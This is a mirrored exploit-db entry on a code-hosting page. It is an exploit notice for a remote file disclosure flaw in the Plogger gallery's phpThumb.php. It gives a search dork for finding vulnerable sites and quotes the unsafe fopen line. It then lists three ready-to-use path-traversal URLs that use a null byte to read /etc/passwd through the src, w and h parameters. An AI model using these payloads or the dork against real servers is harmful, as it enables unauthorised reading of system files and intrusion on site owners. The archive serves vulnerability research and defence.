bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/14636.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

21 lines
No EOL
655 B
Text
Raw Blame History

# Plogger Remote File Disclosure Vulnerability
# http://www.plogger.org/
# dork : Powered by Plogger!
# author: Mr.tro0oqy (yemeni hacker)
# email : t.4@windowslive.com
exp :
Line 117: if ($fp_source = @fopen($_GET['src'],'rb'))
www.server.com/path/plog-includes/lib/phpthumb/phpThumb.php?src=../../../../../../../../etc/passwd%00
Line 41: $_GET['w'] = $matches[1];
Line 42: $_GET['h'] = $matches[2];
www.server.com/path/plog-includes/lib/phpthumb/phpThumb.php?w=../../../../../../../../../etc/passwd%00
www.server.com/path/plog-includes/lib/phpthumb/phpThumb.php?h=../../../../../../../../../etc/passwd%00
greetz : all muslems (ramadan kreem)
Reference in a new issue View git blame Copy permalink